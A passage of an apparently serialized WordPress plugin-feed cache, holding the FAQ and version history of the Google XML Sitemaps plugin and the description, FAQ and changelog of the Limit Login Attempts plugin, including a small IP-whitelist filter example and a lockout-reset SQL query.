href="http://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/help/" title="List of common questions / problems regarding Google (XML) Sitemaps" rel="nofollow">Google Sitemaps FAQ</a>.</p>\n</dd>\n<dt>My question isn&#8217;t even answered there</dt>\n<dd>\n<p>Please post your question at the <a href="https://wordpress.org/support/topic/read-before-opening-a-new-support-topic" rel="nofollow">WordPress support forum</a> and tag your post with &#8220;google-sitemap-generator&#8221;.</p>\n</dd>\n<dt>What&#8217;s new in the latest version?</dt>\n<dd>\n<p>The changelog is maintained <a href="http://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/changelog/" title="Google (XML) Sitemap Generator Plugin Changelog" rel="nofollow">here</a></p>\n</dd>\n<dt>Why is the changelog on a separate page and not here?</dt>\n<dd>\n<p>The WordPress.org repository is just another place to download this plugin. I don&#8217;t want to maintain too many pages with the same content. Thank you for your understanding!</p>\n</dd>\n</dl>\n<p><!--section=changelog--></p>\n<h4>4.0.9 (2017-07-24)</h4>\n<ul>\n<li>Fixed security issue related to donation functionality.</li>\n</ul>\n<h4>4.0.8 (2014-11-15)</h4>\n<ul>\n<li>Fixed bug regarding the exclude categories feature, thanks to Claus Schöffel!</li>\n</ul>\n<h4>4.0.7.1 (2014-09-02)</h4>\n<ul>\n<li>Sorry, no new features this time… This release only updates the Compatibility-Tag to WordPress 4.0. Unfortunately there is no way to do this anymore without a new version</li>\n</ul>\n<h4>4.0.7 (2014-06-23)</h4>\n<ul>\n<li>Better compatibility with GoDaddy managed WP hosting</li>\n<li>Better compatibility with QuickCache</li>\n<li>Removed WordPress version from the sitemap</li>\n<li>Corrected link to WordPress privacy settings (if search engines are blocked)</li>\n<li>Changed hook which is being used for sitemap pings to avoid pings on draft edit</li>\n</ul>\n<h4>4.0.6 (2014-06-03)</h4>\n<ul>\n<li>Added option to disable automatic gzipping</li>\n<li>Fixed bug with duplicated external sitemap entries</li>\n<li>Don’t gzip if behind Varnish since Varnish can do that</li>\n</ul>\n<h4>4.0.5 (2014-05-18)</h4>\n<ul>\n<li>Added function to manually start ping for main-sitemap or all sub-sitemaps</li>\n<li>Added support for changing the base of the sitemap URL to another URL (for WP installations in sub-folders)</li>\n<li>Fixed issue with empty post sitemaps (related to GMT/local time offset)</li>\n<li>Fixed some timing issues in archives</li>\n<li>Improved check for possible problems before gzipping</li>\n<li>Fixed empty archives and author sitemaps in case there were no posts</li>\n<li>Fixed bug which caused the Priority Provider to disappear in recent PHP versions</li>\n<li>Plugin will also ping with the corresponding sub-sitemap in case a post was modified</li>\n<li>Better checking for empty external urls</li>\n<li>Changed text in XSL template to be more clear about sitemap-index and sub-sitemaps</li>\n<li>Changed content type to text/xml to improve compatibility with caching plugins</li>\n<li>Changed query parameters to is_feed=true to improve compatibility with caching plugins</li>\n<li>Switched from using WP_Query to load posts to a custom SQL statement to avoid problems with other plugin filters</li>\n<li>Added caching of some SQL statements</li>\n<li>Added support feed for more help topics</li>\n<li>Added link to new help page</li>\n<li>Cleaned up code and renamed variables to be more readable</li>\n<li>Updated Japanese Translation, thanks to Daisuke Takahashi</li>\n</ul>\n<h4>4.0.4 (2014-04-19)</h4>\n<ul>\n<li>Removed deprecated get_page call</li>\n<li>Changed last modification time of sub-sitemaps to the last modification date of the posts instead of the publish date</li>\n<li>Removed information window if the statistic option has not been activated</li>\n<li>Added link regarding new sitemap format</li>\n<li>Updated Portuguese translation, thanks to Pedro Martinho</li>\n<li>Updated German translation</li>\n</ul>\n<h4>4.0.3 (2014-04-13)</h4>\n<ul>\n<li>Fixed compression if an gzlib handler was already active</li>\n<li>Help regarding permalinks for Nginx users</li>\n<li>Fix with gzip compression in case there was other output before already</li>\n<li>Return 404 for HTML sitemaps if the option has been disabled</li>\n<li>Updated translations</li>\n</ul>\n<h4>4.0.2 (2014-04-01)</h4>\n<ul>\n<li>Fixed warning if an gzip handler is already active</li>\n</ul>\n<h4>4.0.1 (2014-03-31)</h4>\n<ul>\n<li>Fixed bug with custom post types including a &#8220;-&#8220;</li>\n<li>Fixed some 404 Not Found Errors</li>\n</ul>\n<h4>4.0 (2014-03-30)</h4>\n<ul>\n<li>No static files anymore, sitemap is created on the fly!</li>\n<li>Sitemap is split-up into sub-sitemaps by month, allowing up to 50.000 posts per month! <a href="http://www.arnebrachhold.de/projects/wordpress-plugins/google-xml-sitemaps-generator/google-xml-sitemap-generator-new-sitemap-format/" rel="nofollow">More information</a></li>\n<li>Support for custom post types and custom taxonomis!</li>\n<li>100% Multisite compatible, including by-blog and network activation.</li>\n<li>Reduced server resource usage due to less content per request.</li>\n<li>New API allows other plugins to add their own, separate sitemaps.</li>\n<li>Note: PHP 5.1 and WordPress 3.3 is required! The plugin will not work with lower versions!</li>\n<li>Note: This version will try to rename your old sitemap files to *-old.xml. If that doesn’t work, please delete them manually since no static files are needed anymore!</li>\n</ul>\n<h4>3.4.1 (2014-04-10)</h4>\n<ul>\n<li>Compatibility with mysqli</li>\n</ul>\n<h4>Version 3.4 (2013-11-24)</h4>\n<ul>\n<li>Fixed deprecation warnings in PHP 5.4, thanks to Dion Hulse!</li>\n</ul>\n<h4>3.3 (2013-09-28)</h4>\n<ul>\n<li>Fixed problem with file permission checking</li>\n<li>Filter out hashs (#) in URLs</li>\n</ul>\n<h4>3.2.9 (2013-01-11)</h4>\n<ul>\n<li>Fixed security issue with change frequencies and filename of sitemap file. Exploit was only possible with admin account.</li>\n</ul>\n<h4>3.2.8 (2012-08-08)</h4>\n<ul>\n<li>Fixed wrong custom taxonomy URLs, thanks to ramon fincken of the wordpress.org forum!</li>\n<li>Removed ASK ping since they shut down their service.</li>\n<li>Exclude post_format taxonomy from custom taxonomy list</li>\n</ul>\n<h4>3.2.7 (2012-04-24)</h4>\n<ul>\n<li>Fixed custom post types, thanks to clearsite of the wordpress.org forum!</li>\n<li>Fixed broken admin layout on WP 3.4</li>\n</ul>\n<h4>3.2.6 (2011-09-19)</h4>\n<ul>\n<li>Removed YAHOO ping since YAHOO uses bing now</li>\n<li>Removed deprecated function call</li>\n</ul>\n<h4>3.2.5 (2011-07-11)</h4>\n<ul>\n<li>Backported Bing ping success fix from beta</li>\n<li>Added friendly hint to try out the new beta</li>\n</ul>\n<h4>3.2.4 (2010-05-29)</h4>\n<ul>\n<li>Added (GMT) to date column in sitemap xslt template to avoid confusion with different time zones</li>\n<li>Fixed wrong SQL statement for author pages, thanks to twoenoug</li>\n<li>Fixed several deprecated function calls</li>\n<li>Note: This release does not support the new multisite feature of WordPress yet and will not be active when multisite is enabled.</li>\n</ul>\n<h4>3.2.3 (2010-04-02)</h4>\n<ul>\n<li>Fixed that all pages were missing in the sitemap if the “Uncategorized” category was excluded</li>\n</ul>\n<h4>3.2.2 (2009-12-19)</h4>\n<ul>\n<li>Updated compatibility tag to WordPress 2.9</li>\n<li>Fixed PHP4 problems</li>\n</ul>\n<h4>3.2.1 (2009-12-16)</h4>\n<ul>\n<li>Notes and update messages at the top of the admin page could interfere with the manual build function</li>\n<li>Help links in the WP contextual help were not shown anymore since the last update</li>\n<li>IE 7 sometimes displayed a cached admin page</li>\n<li>Removed invalid link to config page from the plugin description (The link lead to a &#8220;Not enough permission error&#8221;)</li>\n<li>Improved performance of getting the current plugin version by caching</li>\n<li>Updated Spanish language files</li>\n</ul>\n<h4>3.2 (2009-11-23)</h4>\n<ul>\n<li>Added function to show the actual results of a ping instead of only linking to the url</li>\n<li>Added new hook (sm_rebuild) for third party plugins to start building the sitemap</li>\n<li>Fixed bug which showed the wrong URL for the latest Google ping result</li>\n<li>Added some missing documentation</li>\n<li>Removed hardcoded php name for sitemap file in admin urls</li>\n<li>Uses KSES for showing ping test results</li>\n<li>Ping test fixed for WP &lt; 2.3</li>\n</ul>\n<h4>3.1.9 (2009-11-13)</h4>\n<ul>\n<li>Fixed MySQL Error if author pages were included</li>\n</ul>\n<h4>3.1.8 (2009-11-07)</h4>\n<ul>\n<li>Improved custom taxonomy handling and fixed wrong last modification date</li>\n<li>Fixed fatal error in WordPress versions lower than 2.3</li>\n<li>Fixed Update Notice for WordPress 2.8 and higher</li>\n<li>Added warning if blog privacy is activated</li>\n<li>Fixed priorities of additional pages were shown as 0 instead of 1</li>\n</ul>\n<h4>3.1.7 (2009-10-21)</h4>\n<ul>\n<li>Added support for custom taxonomies. Thanks to Lee!</li>\n</ul>\n<h4>3.1.6 (2009-08-31)</h4>\n<ul>\n<li>Fixed PHP error “Only variables can be passed by reference”</li>\n<li>Fixed wrong URLS of multi-page posts (Thanks artstorm!)</li>\n<li>Updated many language files</li>\n</ul>\n<h4>3.1.5 (2009-08-24)</h4>\n<ul>\n<li>Added option to completely disable the last modification time</li>\n<li>Fixed problem with HTTPS url for the XSL stylesheet if the sitemap was build via the admin panel</li>\n<li>Improved handling of homepage entry if a single page was set for it</li>\n<li>Fixed mktime warning which appeared sometimes</li>\n<li>Fixed bug which caused inf. reloads after rebuilding the sitemap via the admin panel</li>\n<li>Improved handling of missing sitemaps files if WP was moved to another location</li>\n</ul>\n<h4>3.1.4 (2009-06-22)</h4>\n<ul>\n<li>Fixed bug which broke all pings in WP older than 2.7</li>\n<li>Added more output in debug mode if pings fail</li>\n<li>Moved global post variable so other plugins can use it in get_permalink()</li>\n<li>Added small icon for ozh admin menu</li>\n<li>Added more help links in UI</li>\n</ul>\n<h4>3.1.3 (2009-06-07)</h4>\n<ul>\n<li>Changed MSN Live Search to Bing</li>\n<li>Exclude categories also now exludes the category itself and not only the posts</li>\n<li>Pings now use the new WordPress HTTP API instead of Snoopy</li>\n<li>Fixed bug that in localized WP installations priorities could not be saved</li>\n<li>The sitemap cron job is now cleared after a manual rebuild or after changing the config</li>\n<li>Adjusted style of admin area for WP 2.8 and refreshed icons</li>\n<li>Disabled the “Exclude categories” feature for WP 2.5.1, since it doesn’t have the required functions yet</li>\n</ul>\n<h4>3.1.2 (2008-12-26)</h4>\n<ul>\n<li>Changed the way the stylesheet is saved (default / custom stylesheet)</li>\n<li>Sitemap is now rebuild when a page is published</li>\n<li>Removed support for static robots.txt files, this is now handled via WordPress functions</li>\n<li>Added compat. exceptions for WP 2.0 and WP 2.1</li>\n</ul>\n<h4>3.1.1 (2008-12-21)</h4>\n<ul>\n<li>Fixed redirect issue if wp-admin is rewritten via mod_rewrite, thanks to macjoost</li>\n<li>Fixed wrong path to assets, thanks PozHonks</li>\n<li>Fixed wrong plugin URL if wp-content was renamed / redirected, thanks to wnorris</li>\n<li>Updated WP User Interface for 2.7</li>\n<li>Various other small things</li>\n</ul>\n<h4>3.1.0.1 (2008-05-27)</h4>\n<ul>\n<li>Extracted UI JS to external file</li>\n<li>Enabled the option to include following pages of multi-page posts</li>\n<li>Script tries to raise memory and time limit if active</li>\n</ul>\n<h4>3.1 (2008-05-22)</h4>\n<ul>\n<li>Marked as stable</li>\n</ul>\n<h4>3.1b3 (2008-05-19)</h4>\n<ul>\n<li>Cleaned up plugin directory and moved img files to subfolders</li>\n<li>Fixed background building bug in WP 2.1</li>\n<li>Removed auto-update plugin link for WP &lt; 2.5</li>\n</ul>\n<h4>3.1b2 (2008-05-18)</h4>\n<ul>\n<li>Fixed critical bug with the build in background option</li>\n<li>Added notification if a build is scheduled</li>\n</ul>\n<h4>3.1b1 (2008-05-08)</h4>\n<ul>\n<li>Splitted plugin in loader, generator and user interface to save memory</li>\n<li>Generator and UI will only be loaded when needed</li>\n<li>Secured all admin actions with nonces</li>\n<li>Improved WP 2.5 handling</li>\n<li>New &#8220;Suggest a Feature&#8221; link</li>\n</ul>\n<h4>3.0.3.3 (2008-04-29)</h4>\n<ul>\n<li>Fixed author pages</li>\n<li>Enhanced background building and increased delay to 15 seconds</li>\n<li>Enabled background building by default</li>\n</ul>\n<h4>3.0.3.2 (2008-04-28)</h4>\n<ul>\n<li>Improved WP 2.5 handling (fixes blank screens and timeouts)</li>\n</ul>\n<h4>3.0.3.1 (2008-03-30)</h4>\n<ul>\n<li>Added compatibility CSS for WP 2.5</li>\n</ul>\n<h4>3.0.3 (2007-12-30)</h4>\n<ul>\n<li>Added option to ping MSN Live Search</li>\n<li>Removed some WordPress hooks (the sitemap isn’t updates with every comment anymore)</li>\n</ul>\n<h4>3.0.2.1 (2007-11-28)</h4>\n<ul>\n<li>Fixed wrong XML Schema Location (Thanks to Emanuele Tessore)</li>\n<li>Added Russian Language files by Sergey http://ryvkin.ru</li>\n</ul>\n<h4>3.0.2 (2007-11-25)</h4>\n<ul>\n<li>Fixed bug which caused that some settings were not saved correctly</li>\n<li>Added option to exclude pages or post by ID</li>\n<li>Restored YAHOO ping service with API key since the other one is to unreliable</li>\n</ul>\n<h4>3.0.1 (2007-11-03)</h4>\n<ul>\n<li>Changed HTTP client for ping requests to Snoopy</li>\n<li>Added &#8220;safemode&#8221; for SQL which doesn’t use unbuffered results</li>\n<li>Added option to run the building process in background using wp-cron</li>\n<li>Added links to test the ping if it failed</li>\n</ul>\n<h4>3.0 final (2007-09-24)</h4>\n<ul>\n<li>Marked as stable</li>\n<li>Removed useless functions</li>\n</ul>\n<h4>3.0b11 (2007-09-23)</h4>\n<ul>\n<li>Changed mysql queries to unbuffered queries</li>\n<li>Uses MUCH less memory</li>\n<li>Option to limit the number of posts</li>\n</ul>\n<h4>3.0b10 (2007-09-04)</h4>\n<ul>\n<li>Added category support for WordPress 2.3</li>\n<li>Fixed bug with empty URLs in sitemap</li>\n<li>Repaired GET building</li>\n</ul>\n<h4>3.0b9 (2007-09-02)</h4>\n<ul>\n<li>Added tag support for WordPress 2.3</li>\n<li>Fixed archive bug with static pages (Thanks to Peter Claus Lamprecht)</li>\n<li>Fixed some missing translation strings, thanks to Kirin Lin</li>\n</ul>\n<h4>3.0b8 (2007-07-22)</h4>\n<ul>\n<li>Fixed bug with empty categories</li>\n<li>Fixed bug with translation plugins</li>\n<li>Added support for robots.txt</li>\n<li>Switched YAHOO ping API from YAHOO Web Services to the “normal” ping service</li>\n<li>Search engines will only be pinged if the sitemap file has changed</li>\n</ul>\n<h4>3.0b7 (2007-05-17)</h4>\n<ul>\n<li>Added Ask.com notification</li>\n<li>Added option to include the author pages like /author/john</li>\n<li>Fixed WP 2.1 / Pre 2.1 post / pages database changes</li>\n<li>Added check to not build the sitemap if importing posts</li>\n<li>Fixed wrong XSLT location (Thanks froosh)</li>\n<li>Small enhancements and bug fixes</li>\n</ul>\n<h4>3.0b6 (2007-01-23)</h4>\n<ul>\n<li>sitemap.xml.gz was not compressed</li>\n<li>YAHOO update-notification was PHP5 only (Thanks to Joseph Abboud!)</li>\n<li>More WP 2.1 optimizations</li>\n<li>Reduced memory usage with PHP5</li>\n</ul>\n<h4>3.0b5 (2007-01-19)</h4>\n<ul>\n<li>WordPress 2 Design</li>\n<li>YAHOO update notification</li>\n<li>New status report, removed ugly logfiles</li>\n<li>Added option to define a XSLT stylesheet and added a default one</li>\n<li>Fixed bug with sub-pages, thanks to <a href="http://baptiste.us/" rel="nofollow">Mike</a>, <a href="http://fastagent.de/" rel="nofollow">Peter</a> and <a href="http://publicityship.com.au/" rel="nofollow">Glenn</a></li>\n<li>Improved file handling, thanks to <a href="http://www.vjtd3.com/" rel="nofollow">VJTD3</a></li>\n<li>WP 2.1 improvements</li>\n</ul>\n<h4>3.0b4 (2006-11-16)</h4>\n<ul>\n<li>Fixed some smaller bugs</li>\n<li>Decreased memory usage which should solve timeout and memory problems</li>\n<li>Updated namespace to support YAHOO and MSN</li>\n</ul>\n<h4>3.0b2 (2006-01-14)</h4>\n<ul>\n<li>Fixed several bugs reported by users</li>\n</ul>\n<h4>3.0b (2005-11-25)</h4>\n<ul>\n<li>WordPress 2.0 (Beta, RC1) compatible</li>\n<li>Added different priority calculation modes and introduced an API to create custom ones (Some people didn’t like the way to calculate the post priority based on the count of user comments. This will give you the possibility to develop custom priority providers which fit your needs.)</li>\n<li>Added support to use the <a href="http://www.alexking.org/blog/2005/07/27/popularity-contest-11/" rel="nofollow">Popularity Contest</a> plugin by <a href="http://www.alexking.org/" rel="nofollow">Alex King</a> to calculate post priority (If you are already using the Popularity Contest plugin, this will be the best way to determine the priority of the posts. Uses to new priority API noted above.)</li>\n<li>Added option to exclude password protected posts (This was one of the most requested features.)</li>\n<li>Posts and pages marked for publish with a date in the future won’t be included</li>\n<li>Added function to start sitemap creation via GET and a secret key (If you are using external software which directly writes into the database without using the WordPress API, you can rebuild the sitemap with a simple HTTP Request. This can be made with a cron job for example.)</li>\n<li>Improved compatibility with other plugins (There should no longer be problems with other plugins now which checked for existence of a specified function to determine if you are in the control panel or not.)</li>\n<li>Recoded plugin architecture which is now fully OOP (The code is now cleaner and better to understand which makes it easier to modify. This should also avoid namespace problems.)</li>\n<li>Improved speed and optimized settings handling (Settings and pages are only loaded if the sitemap generation process starts and not every time a page loads. This saves one MySQL Query on every request.)</li>\n<li>Added Button to restore default configuration (Messed up the config? You’ll need just one click to restore all settings.)</li>\n<li>Added log file to check everything is running (In the new log window you can see when your sitemap was rebuilt or if there was any error.)</li>\n<li>Improved user-interface</li>\n<li>Added several links to homepage and support (This includes the Notify List about new releases and the WordPress support forum.)</li>\n</ul>\n<h4>2.7 (2005-11-25)</h4>\n<ul>\n<li>Added Polish Translation by <a href="http://kubazwolinski.com/" rel="nofollow">kuba</a></li>\n</ul>\n<h4>2.7 (2005-11-01)</h4>\n<ul>\n<li>Added French Translation by <a href="http://www.chezthierry.info/" rel="nofollow">Thierry Lanfranchi</a></li>\n</ul>\n<h4>2.7 (2005-07-21)</h4>\n<ul>\n<li>Fixed bug with incorrect date in additional pages (wrong format)</li>\n<li>Added Swedish Translation by <a href="http://tobiasbergius.se/" rel="nofollow">Tobias Bergius</a></li>\n</ul>\n<h4>2.6 (2005-07-16)</h4>\n<ul>\n<li>Included Chinese (Simplified) language files by <a href="http://www.june6.cn/" rel="nofollow">june6</a></li>\n</ul>\n<h4>2.6 (2005-07-04)</h4>\n<ul>\n<li>Added support to store the files at a custom location</li>\n<li>Changed the home URL to have a slash at the end</li>\n<li>Fixed errors with wp-mail</li>\n<li>Added support for other plugins to add content to the sitemap</li>\n</ul>\n<h4>2.5 (2005-06-15)</h4>\n<ul>\n<li>You can include now external pages which aren’t generated by WordPress or are not recognized by this plugin</li>\n<li>You can define a minimum post priority, which will overrride the calculated value if it’s too low</li>\n<li>The plugin will automatically ping Google whenever the sitemap gets regenerated</li>\n<li>Update 1: Included Spanish translations by <a href="http://www.cesargomez.org/" rel="nofollow">Cesar Gomez Martin</a></li>\n<li>Update 2: Included Italian translations by <a href="http://wordpress-it.it/" rel="nofollow">Stefano Aglietti</a></li>\n<li>Update 3: Included Traditional Chinese translations by <a href="http://kirin-lin.idv.tw/" rel="nofollow">Kirin Lin</a></li>\n</ul>\n<h4>2.2 (2005-06-08)</h4>\n<ul>\n<li>Language file support: <a href="http://hiromasa.zone.ne.jp/" rel="nofollow">Hiromasa</a> from <a href="http://hiromasa.zone.ne.jp/" rel="nofollow">http://hiromasa.zone.ne.jp</a> sent me a japanese version of the user interface and modified the script to support it! Thanks for this! Check <a href="https://codex.wordpress.org/WordPress_Localization" rel="nofollow">the WordPress Codex</a> how to set the language in WordPress.</li>\n<li>Added Japanese user interface by <a href="http://hiromasa.zone.ne.jp/" rel="nofollow">Hiromasa</a></li>\n<li>Added German user interface by me</li>\n</ul>\n<h4>2.12 (2005-06-07)</h4>\n<ul>\n<li>Changed SQL Statement for categories that it also works on MySQL 3</li>\n</ul>\n<h4>2.11 (2005-06-07)</h4>\n<ul>\n<li>Fixed a hardcoded tablename which made a SQL error</li>\n</ul>\n<h4>2.1 (2005-06-07)</h4>\n<ul>\n<li>Can also generate a gzipped version of the xml file (sitemap.xml.gz)</li>\n<li>Uses correct last modification dates for categories and archives. (Thanks to thx <a href="http://www.shupe.ca/" rel="nofollow">Rodney Shupe</a> for the SQL)</li>\n<li>Supports now different WordPress / Blog directories</li>\n<li>Fixed bug which ignored different post/page priorities (Reported by <a href="http://h3h.net/" rel="nofollow">Brad</a>)</li>\n</ul>\n<h4>2.01 (2005-06-07)</h4>\n<ul>\n<li>Fixed compatibility for PHP installations which are not configured to use short open tags</li>\n<li>Changed Line 147 from _e($i); to _e(strval($i));</li>\n<li>Thanks to <a href="http://publicvoidblog.de/" rel="nofollow">Christian Aust</a> for reporting this!</li>\n</ul>\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:60:"https://wordpress.org/plugins/google-sitemap-generator/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"0";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:8;a:6:{s:4:"data";s:39:"\n		\n		\n		\n		\n		\n		\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:5:{s:0:"";a:6:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:20:"Limit Login Attempts";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:51:"https://wordpress.org/plugins/limit-login-attempts/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:59:"https://wordpress.org/plugins/limit-login-attempts/#respond";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 15 Jan 2009 14:20:42 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:54:"https://wordpress.org/plugins-wp/limit-login-attempts/";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:91:"Limit rate of login attempts, including by way of cookies, for each IP. Fully customizable.";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:0:"";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:11518:"<p><!--section=description--></p>\n<p>Limit the number of login attempts possible both through normal login as well as using auth cookies.</p>\n<p>By default WordPress allows unlimited login attempts either through the login page or by sending special cookies. This allows passwords (or hashes) to be brute-force cracked with relative ease.</p>\n<p>Limit Login Attempts blocks an Internet address from making further attempts after a specified limit on retries is reached, making a brute-force attack difficult or impossible.</p>\n<p>Features</p>\n<ul>\n<li>Limit the number of retry attempts when logging in (for each IP). Fully customizable</li>\n<li>Limit the number of attempts to log in using auth cookies in same way</li>\n<li>Informs user about remaining retries or lockout time on login page</li>\n<li>Optional logging, optional email notification</li>\n<li>Handles server behind reverse proxy</li>\n<li>It is possible to whitelist IPs using a filter. But you probably shouldn&#8217;t. 🙂</li>\n</ul>\n<p>Translations: Bulgarian, Brazilian Portuguese, Catalan, Chinese (Traditional), Czech, Dutch, Finnish, French, German, Hungarian, Norwegian, Persian, Romanian, Russian, Spanish, Swedish, Turkish</p>\n<p>Plugin uses standard actions and filters only.</p>\n<p><!--section=installation--></p>\n<ol>\n<li>Download and extract plugin files to a wp-content/plugin directory.</li>\n<li>Activate the plugin through the WordPress admin interface.</li>\n<li>Customize the settings on the options page, if desired. If your server is located behind a reverse proxy make sure to change this setting.</li>\n</ol>\n<p>If you have any questions or problems please make a post here: https://wordpress.org/tags/limit-login-attempts</p>\n<p><!--section=faq--></p>\n<dl>\n<dt>Why not reset failed attempts on a successful login?</dt>\n<dd>\n<p>This is very much by design. Otherwise you could brute force the &#8220;admin&#8221; password by logging in as your own user every 4th attempt.</p>\n</dd>\n<dt>What is this option about site connection and reverse proxy?</dt>\n<dd>\n<p>A reverse proxy is a server in between the site and the Internet (perhaps handling caching or load-balancing). This makes getting the correct client IP to block slightly more complicated.</p>\n<p>The option default to NOT being behind a proxy &#8212; which should be by far the common case.</p>\n</dd>\n<dt>How do I know if my site is behind a reverse proxy?</dt>\n<dd>\n<p>You probably are not or you would know. We show a pretty good guess on the option page. Set the option using this unless you are sure you know better.</p>\n</dd>\n<dt>Can I whitelist my IP so I don&#8217;t get locked out?</dt>\n<dd>\n<p>First please consider if you really need this. Generally speaking it is not a good idea to have exceptions to your security policies.</p>\n<p>That said, there is now a filter which allows you to do it: &#8220;limit_login_whitelist_ip&#8221;.</p>\n<p>Example:<br />\nfunction my_ip_whitelist($allow, $ip) {<br />\n     return ($ip == &#8216;my-ip&#8217;) ? true : $allow;<br />\n}<br />\nadd_filter(&#8216;limit_login_whitelist_ip&#8217;, &#8216;my_ip_whitelist&#8217;, 10, 2);</p>\n<p>Note that we still do notification and logging as usual. This is meant to allow you to be aware of any suspicious activity from whitelisted IPs.</p>\n</dd>\n<dt>I locked myself out testing this thing, what do I do?</dt>\n<dd>\n<p>Either wait, or:</p>\n<p>If you know how to edit / add to PHP files you can use the IP whitelist functionality described above. You should then use the &#8220;Restore Lockouts&#8221; button on the plugin settings page and remove the whitelist function again.</p>\n<p>If you have ftp / ssh access to the site rename the file &#8220;wp-content/plugins/limit-login-attempts/limit-login-attempts.php&#8221; to deactivate the plugin.</p>\n<p>If you have access to the database (for example through phpMyAdmin) you can clear the limit_login_lockouts option in the wordpress options table. In a default setup this would work: &#8220;UPDATE wp_options SET option_value = &#8221; WHERE option_name = &#8216;limit_login_lockouts\'&#8221;</p>\n</dd>\n</dl>\n<p><!--section=changelog--></p>\n<h4>1.7.1</h4>\n<p>This version fixes a security bug in version 1.6.2 and 1.7.0. Please upgrade immediately.</p>\n<p>&#8220;Auth cookies&#8221; are special cookies set at login that authenticating you to the system. It is how WordPress &#8220;remembers&#8221; that you are logged in between page loads.</p>\n<p>During lockout these are supposed to be cleared, but a change in 1.6.2 broke this. It allowed an attacker to keep trying to break these cookies during a lockout.</p>\n<p>Lockout of normal password login attempts still worked as it should, and it appears that all &#8220;auth cookie&#8221; attempts would keep getting logged.</p>\n<p>In theory the &#8220;auth cookie&#8221; is quite resistant to brute force attack. It contains a cryptographic hash of the user password, and the difficulty to break it is not based on the password strength but instead on the cryptographic operations used and the length of the hash value. In theory it should take many many years to break this hash. As theory and practice does not always agree it is still a good idea to have working lockouts of any such attempts.</p>\n<h4>1.7.0</h4>\n<ul>\n<li>Added filter that allows whitelisting IP. Please use with care!!</li>\n<li>Update to Spanish translation, thanks to Marcelo Pedra</li>\n<li>Updated Swedish translation</li>\n<li>Tested against WordPress 3.3.2</li>\n</ul>\n<h4>1.6.2</h4>\n<ul>\n<li>Fix bug where log would not get updated after it had been cleared</li>\n<li>Do plugin setup in &#8216;init&#8217; action</li>\n<li>Small update to Spanish translation file, thanks to Marcelo Pedra</li>\n<li>Tested against WordPress 3.2.1</li>\n</ul>\n<h4>1.6.1</h4>\n<ul>\n<li>(WordPress 3.0+) An invalid cookie can sometimes get sent multiple times before it gets cleared, resulting in multiple failed attempts or even a lockout from a single invalid cookie. Store the latest failed cookie to make sure we only count it as one failed attempt</li>\n<li>Define &#8220;Text Domain&#8221; correctly</li>\n<li>Include correct Dutch tranlation file. Thanks to Martin1 for noticing. Thanks again to Bjorn Wijers for the translation</li>\n<li>Updated POT file for this version</li>\n<li>Tested against WordPress 3.1-RC4</li>\n</ul>\n<h4>1.6.0</h4>\n<ul>\n<li>Happy New Year</li>\n<li>Tested against WordPress 3.1-RC1</li>\n<li>Plugin now requires WordPress version 2.8+. Of course you should never ever use anything but the latest version</li>\n<li>Fixed deprecation warnings that had been piling up with the old version requirement. Thanks to Johannes Ruthenberg for the report that prompted this</li>\n<li>Removed auth cookie admin check for version 2.7.</li>\n<li>Make sure relevant values in $_COOKIE get cleared right away on auth cookie validation failure. There are still some problems with cookie auth handling. The lockout can trigger prematurely in rare cases, but fixing it is plugin version 2 stuff unfortunately.</li>\n<li>Changed default time for retries to reset from 24 hours to 12 hours. The security impact is very minor and it means the warning will disappear &#8220;overnight&#8221;</li>\n<li>Added question to FAQ (&#8220;Why not reset failed attempts on a successful login?&#8221;)</li>\n<li>Updated screenshots</li>\n</ul>\n<h4>1.5.2</h4>\n<ul>\n<li>Reverted minor cookie-handling cleanup which might somehow be responsible for recently reported cookie related lockouts</li>\n<li>Added version 1.x Brazilian Portuguese translation, thanks to Luciano Passuello</li>\n<li>Added Finnish translation, thanks to Ari Kontiainen</li>\n</ul>\n<h4>1.5.1</h4>\n<ul>\n<li>Further multisite &amp; WPMU support (again thanks to <a 